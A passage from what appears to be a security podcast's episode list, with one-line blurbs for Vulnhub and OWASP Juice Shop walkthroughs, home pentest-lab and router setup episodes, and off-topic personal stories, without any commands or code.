  1. I get my young son red hot mad at me as I sing I See the Moon and even some Beyonce tunes to cheer him up.

  2. I entered a contest to remix a Barenaked Ladies song (Easy), but they wouldn't even accept my entry! Maybe you will :'(

View this episode's show notes for more information

202: News and Links Roundup

View this episode's show notes for more information

204: OFF-TOPIC - IT Horror Stories!

Today's off-topic show is one of my favorite IT horror stories, featuring a red-hot angry lawyer who was having password issues. I had the joy of dealing with his hair-trigger temper on a Saturday over a crappy cell phone connection.

View this episode's show notes for more information

205: News and Links Roundup

View this episode's show notes for more information

206: Vulnhub Walkthrough - Stapler

The following is a semi-spoilerish walkthrough of the Stapler VM from Vulnhub by g0tmi1k.

View this episode's show notes for more information

207: Vulnhub Walkthrough - Sidney

The following is a semi-spoilerish walkthrough of the Sidney VM from Vulnhub by Knightmare2600.

View this episode's show notes for more information

208: OFF-TOPIC - The Jackwagon Who Stole My Drums!

This off-topic episode is about a "friend" (I'm using air quotes) of mine who stole a set of drums from me. Then he sold them for dirt cheap, promised to pay me back (but didn't) and force me to take him to court. "Fun stuff!" Brian said sarcastically! Tune into today's episode to see where this heated legal battle is at.

View this episode's show notes for more information

209: News and Links Roundup

View this episode's show notes for more information

210: Vulnhub Walkthrough - Mr. Robot

The following is a semi-spoilerish walkthrough of the Mr. Robot VM from Vulnhub by Jason (couldn't find a link for him! Hrmm....mysterious!).

View this episode's show notes for more information

211: OFF-TOPIC - IT Horror Stories - Part 2

In today's episode I share some big news (SPOILER ALERT: I'm building a vulnhub.com vulnerable VM!) and also tell you about a client that was happy to pay me to watch progress bars for hours, but not happy to give me a 15 minute break for dinner.

View this episode's show notes for more information

212: News and Links Roundup

View this episode's show notes for more information

213: Building a Vulnerable VM (The Prequel)

In this episode, I share a short list of virtual landmines you'll want to avoid when building your vulnerable VM for vulnhub.com.

View this episode's show notes for more information

214: News and Links Roundup

View this episode's show notes for more information

215: Installing Ubiquiti EdgeRouter X and AP - Part 1

In today's episode I kick off a multi-part series on ditching my previously beloved Almond router in lieu of a Ubiquiti Edge Router X and access point.

View this episode's show notes for more information

216: News and Links Roundup

View this episode's show notes for more information

217: Installing Ubiquiti EdgeRouter X and AP - Part 2

Continuation of the series started in episode #215.

View this episode's show notes for more information

218: OFF-TOPIC - My Top 5 Favorite and Least Favorite Things About The Division

In today's off-topic episode I talk about my 5 favorite (and least favorite) things about Tom Clancy's The Division for Xbox One. Topics include: dumb boss battles, phantoms and floaters, and unnecessary celebrations.

View this episode's show notes for more information

219: News and Links Roundup

View this episode's show notes for more information

220: Installing Ubiquiti EdgeRouter X and AP - Part 3

Conclusion of the Ubiquiti series - see #215 and #217 for parts 1 and 2.

View this episode's show notes for more information

221: News and Links Roundup

View this episode's show notes for more information

222: OFF-TOPIC - THE FINAL CHAPTER!

This episode is the good/bad news of why I won't be doing off-topic episodes anymore.

View this episode's show notes for more information

223: Vulnhub Walkthrough - Tommy Boy

The following is a semi-spoilerish walkthrough of the vulnerable Tommy Boy VM, hosted on Vulnhub.

View this episode's show notes for more information

224: DIY 500 Dollar Pentesting Lab - Part 1

This episode is part 1 of a series all about setting up a virtual pentesting lab for about 500 bucks. We're kicking off the series with a segment on selecting hardware, getting ESXi installed to a USB drive and then getting all the components hooked up and powered on.

View this episode's show notes for more information

225: DIY 500 Dollar Pentesting Lab - Part 2

This episode is part 2 of a series all about setting up a virtual pentesting lab for about 500 bucks. Part 1 talked about getting the necessary hardware purchased and assembled. Today we walk about the network/storage configuration.

View this episode's show notes for more information

226: DIY 500 Dollar Pentesting Lab - Part 3

This episode is part 3 of a series all about setting up a virtual pentesting lab for about 500 bucks. Part 1 talked about getting the necessary hardware purchased and assembled. Part 2 covered network/storage configuration.

View this episode's show notes for more information

227: Lets Encrypt - Installing SSL Certs for Nessus and Ubiquiti Unifi

Back in episode #220 I went through how to get a cloud-hosted UniFi controller setup so you could do cool things like implement a voucher system for your guests. A next natural step is securing the controller with a proper SSL cert, and thanks to this great article from Steve Jenkins, it's not as hard as it might look. I use it as the backbone of my video demo.

View this episode's show notes for more information

228: Fun with Bettercap

All about installing, configuring and using Bettercap.

View this episode's show notes for more information

229: Intro to Docker for Pentesters

I know I'm old and unhip, but I just got turned on to Docker, and in this episode I wanted to share two cool ways to use it to beef up your pentest skills.

View this episode's show notes for more information

230: Pentesting OWASP Juice Shop - Part 1

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information

231: Pentesting OWASP Juice Shop - Part 2

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information

232: Pentesting OWASP Juice Shop - Part 3

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information

233: Pentesting OWASP Juice Shop - Part 4

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information

234: Pentesting OWASP Juice Shop - Part 5

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information